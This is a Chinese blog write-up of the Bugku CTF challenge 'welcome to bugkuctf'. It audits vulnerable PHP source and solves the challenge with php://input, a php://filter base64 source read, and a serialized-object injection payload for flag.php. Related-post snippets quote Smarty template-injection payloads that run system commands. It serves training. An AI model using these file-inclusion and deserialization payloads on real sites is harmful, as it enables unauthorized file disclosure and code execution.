Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)

最新推荐文章于 2024-08-08 18:00:00 发布
最新推荐文章于 2024-08-08 18:00:00 发布
阅读量9.3k 收藏 9
点赞数 3
分类专栏: ctf PHP 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csu_vc/article/details/78375203
版权
ctf 同时被 2 个专栏收录
11 篇文章 5 订阅
订阅专栏
PHP
4 篇文章 0 订阅
订阅专栏

这里写图片描述

查看源码有提示

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

审计源码,发现本题需要一下要求

  • get方式传递三个参数
  • 存在$user
  • 读取的$user文件内容===welcome to the bugkuctf
  • $file要求为hint.php

关于php://filter
可以看这位大佬的博客
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

关于php://input
官方描述:
“php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data”

于是利用这两个php协议
首先读取hint.php内容

这里写图片描述

得到
这里写图片描述

PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==

base64解码还原

<?php  

class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>

按照同样的方法查看index.php看看

PD9waHAgIA0KJHR4dCA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzc3dvcmQgPSAkX0dFVFsicGFzc3dvcmQiXTsgIA0KICANCmlmKGlzc2V0KCR0eHQpJiYoZmlsZV9nZXRfY29udGVudHMoJHR4dCwncicpPT09IndlbGNvbWUgdG8gdGhlIGJ1Z2t1Y3RmIikpeyAgDQogICAgZWNobyAiaGVsbG8gZnJpZW5kITxicj4iOyAgDQogICAgaWYocHJlZ19tYXRjaCgiL2ZsYWcvIiwkZmlsZSkpeyANCgkJZWNobyAi5LiN6IO9546w5Zyo5bCx57uZ5L2gZmxhZ+WTpiI7DQogICAgICAgIGV4aXQoKTsgIA0KICAgIH1lbHNleyAgDQogICAgICAgIGluY2x1ZGUoJGZpbGUpOyAgIA0KICAgICAgICAkcGFzc3dvcmQgPSB1bnNlcmlhbGl6ZSgkcGFzc3dvcmQpOyAgDQogICAgICAgIGVjaG8gJHBhc3N3b3JkOyAgDQogICAgfSAgDQp9ZWxzZXsgIA0KICAgIGVjaG8gInlvdSBhcmUgbm90IHRoZSBudW1iZXIgb2YgYnVna3UgISAiOyAgDQp9ICANCiAgDQo/PiAgDQogIA0KPCEtLSAgDQokdXNlciA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzcyA9ICRfR0VUWyJwYXNzd29yZCJdOyAgDQogIA0KaWYoaXNzZXQoJHVzZXIpJiYoZmlsZV9nZXRfY29udGVudHMoJHVzZXIsJ3InKT09PSJ3ZWxjb21lIHRvIHRoZSBidWdrdWN0ZiIpKXsgIA0KICAgIGVjaG8gImhlbGxvIGFkbWluITxicj4iOyAgDQogICAgaW5jbHVkZSgkZmlsZSk7IC8vaGludC5waHAgIA0KfWVsc2V7ICANCiAgICBlY2hvICJ5b3UgYXJlIG5vdCBhZG1pbiAhICI7ICANCn0gIA0KIC0tPiAg
<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
        echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  

?>  

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->
  • 提示hint.php中提示flag.php,从index.php可以看到对关键词flag进行了preg_match
  • hint.php中定义了一个类Flag,注意到中间有个 __tostring 方法,这个方法可以理解为将这个类作为字符串执行时会自动执行的一个函数
  • __tostring 方法执行时,将变量$file作为文件名输出文件内容,结合提示flag.php,猜测屏蔽的flag.php文件在此打开
  • 在index.php源码中看到了$password的作用

将hint.php中的Flag方法当做字符串执行时,会自动执行 __tostring方法,只有echo,只能输出一个或多个字符串,所以构造 passwordFlagstring flie=flag.php即可

还注意到
password=unserialize( password);

因此知道需要构造序列化对象payload为

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

这里写图片描述

这里写图片描述

csu_vc
关注
专栏目录
注册GitHub时出现Unable to verify your captcha response.Please visit https://docs.github.com/articles/解决方案
weixin_43178406的博客
07-29 5万+
本文主要介绍了注册GitHub时出现Unable to verify your captcha response. Please visit https://docs.github.com/articles/troubleshooting-connectivity-problems/#troubleshooting-the-captcha for troubleshooting information.解决方案,希望能对学习使用GitHub的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
bugku--PHP代码审计-sha()函数比较绕过
kuller_Yan的博客
10-21 270
bugkuPHP代码审计-sha()函数比较绕过 <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo " "; var_dump($_GET['password']); var_dump(sha1($_GET['name'])); var_dump(sha1($_GET['password'])); if ($_GET['name']
聪明的php(Bugku)
m0_70347972的博客
09-22 497
输入cat命令直接查看文件中的flag
CTFHUB-web-RCE-php://input
最新发布
weixin_68416970的博客
08-08 282
修改 GET 请求为 POST 请求,使用参数 就可以查看到目标站点中的文件,其中 system 是目标系统,括号中的内容执行命令。网页显示源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。在根目录发现了名字带有 flag 的文件,使用cat 命令查看这个文件发现了 flag。使用 file 查看 php://input, 感觉这个网页可能存在文件包含漏洞。刷新页面抓个包,拼接一个之后发包,响应成功。
BugKu_聪明的php
Kobalos的博客
08-16 164
访问目标地址! 看到他的提示,随意传输一个参数,尝试传入一个a 可以看到传入的参数直接被打印了出来,并且显示了源码 先尝试一下phpinfo能不能正常打印吧, http://114.67.246.176:10575/?a=${phpinfo()} 发现phpinfo可以正常回显,回过头看源码,发现ban了大量的命令执行的函数,尝试使用passthru() http://114.67.246.176:10575/?a=${passthru(%22ls%22) 发现执行成功,然后就是漫长的找fla.
bugku--聪明的PHP
m0_65766842的博客
03-28 387
Smarty库的注入
bugku 聪明的php
stantic的博客
03-12 530
​参考资料
welcome to the bugkuctfphp://inputphp://filter伪协议)
wssmiss的博客
07-12 1145
题目 解题思路 查看源代码 源码审计: user存在,且是一个文件,通过file_get_contents()将文件读入字符串r==“welcome to the bugkuctf” 之后会打印输出“hello admin”,并且包含file文件。此处根据提示,file应该是hint.php 要想传入一个文件,可以利用php://input伪协议 preg_match()返回 patt...
php://inputphp://filter的详解与应用
酉酉的博客
02-28 1726
php:// php:// — 访问各个输入/输出流(I/O streams) php://input php://input 是个可以访问请求的原始数据的只读流。 简单来说就是就是读取POST的原生数据 比如: &lt;?php $file = $_GET['file']; echo file_get_contents($file,'r'); echo "&lt;br&gt;&lt;/...
CTF/CTF练习平台-welcome to bugkuctfphp //filterphp //input
qq_43679507的博客
01-10 804
CTF/CTF练习平台-welcome to bugkuctfphp //filterphp //input
Access to XMLHttpRequest at ‘file:///D:/xx/xxx.json‘ from origin ‘null‘ has been blocked by CORS问题解决
oscar999的专栏
04-12 9938
在浏览器打开本地的html文件, 上面proxy中的url获取的就是一个本地文件, 协议是file://,如果是在服务器启动的话,则使用的是http或者https协议。 出于安全性考虑, Chrome默认禁止了这种用法,file协议和http/https协议不同,会被Chrome认为是跨域访问,所以会报被CORS(Cross-Origin Resource Sharing,跨域资源共享)的安全策略阻止。
Bugku 聪明的php
qq_53460654的博客
05-04 233
进入环境发现: pass a parameter and maybe the flag file’s filename is random ???? 意思是传递一个参数 所以我们get传参试试 进行代码审计: 发现smarty是个模板,测试一下是不是模板注入 所以 我们要了解一下smarty模板注入 然后发现过滤了很多函数,但是passthru没有被过滤 passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmpl
使用php执行linux命令
janthinasnail的博客
06-14 1915
程序执行函数 escapeshellarg— 把字符串转码为可以在 shell 命令里使用的参数 escapeshellcmd— shell 元字符转义 exec— 执行一个外部程序 passthru— 执行外部程序并且显示原始输出 proc_close— 关闭由 proc_open 打开的进程并且返回进程退出码 proc_get_status— 获取由 proc_open...
Bugku web 聪明的php
weixin_49633310的博客
03-17 2946
Bugku web 聪明的php模板注入打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为smarty模板注入 常用payload {if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag'
Bugku-CTF-聪明的php
m0_52484587的博客
08-04 865
传递一个参数,可能标记文件的文件名是随机的:于是传一下参,在原网页后面加上/?a=1,发现网页出现了变化3.传入参数,一般情况下是文件包含,或者命令执行,而这道题目比较新颖,使用的是php模板注入4.根据测试2*4=8,确定是smarty模板注入测试phpinfo()函数5.真的是百密一疏,过滤了好多的函数,好在没有把过滤6.没有发现flag,但是发现_12016文件,直接读一波,cat被过滤了,我是用的是more得到flag。
bugku-web-聪明的php
qq_75121443的博客
04-02 818
直接查看这些文件,但是cat被过滤,所以不能使用linux命令,直接使用php函数进行查看。一定要注意,这里指定php代码时要将其用{}扩起来,表示这时php代码,不然执行不成功。再细看这些没有反馈的文件名,你说有没有可能这写没有反馈和后缀的名称,是一个个文件夹。反之接下来就是整体电脑文件的全部查询了,直到找到flag文件的存放位置。要想办法绕过过滤,让value中的恶意执行代码成功执行。因为这里对字段的过滤,带有file的都不行。挨个读取文件,有的文件没有回显,是空文件。选择show_source。
BugkuWeb:聪明的PHP
Light_inthe_eyes的博客
11-03 366
提示让我们传参: 随便url里传入一个参数,得到一串代码: 代码审计,当为False时都会跳转到template.html,在elseif中过滤了很多读取的命令。 出于习惯,随手就来了个简单的模板注入,发现有回显!: 这道题是一道Smarty的模板注入,查找资料: Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI 有很大区别。 一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号。 Smarty支持使用{php}{/php}标
将desktop文件中http://10.1.200.15:8090/#/unicardswipe 替换为http://10.1.200.3/board/welcome
06-11
可以使用sed命令来进行文件内容的替换,具体命令如下: ``` sed -i 's#http://10.1.200.15:8090/#/unicardswipe#http://10.1.200.3/board/welcome#g' your_desktop_file.desktop ``` 其中,-i选项表示直接修改文件内容,而不是输出到终端。s命令则表示替换操作,#作为分隔符,避免了替换内容中包含/的情况影响到替换操作。your_desktop_file.desktop是待修改的desktop文件名,替换完成后,该文件中所有的http://10.1.200.15:8090/#/unicardswipe都会被替换为http://10.1.200.3/board/welcome。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值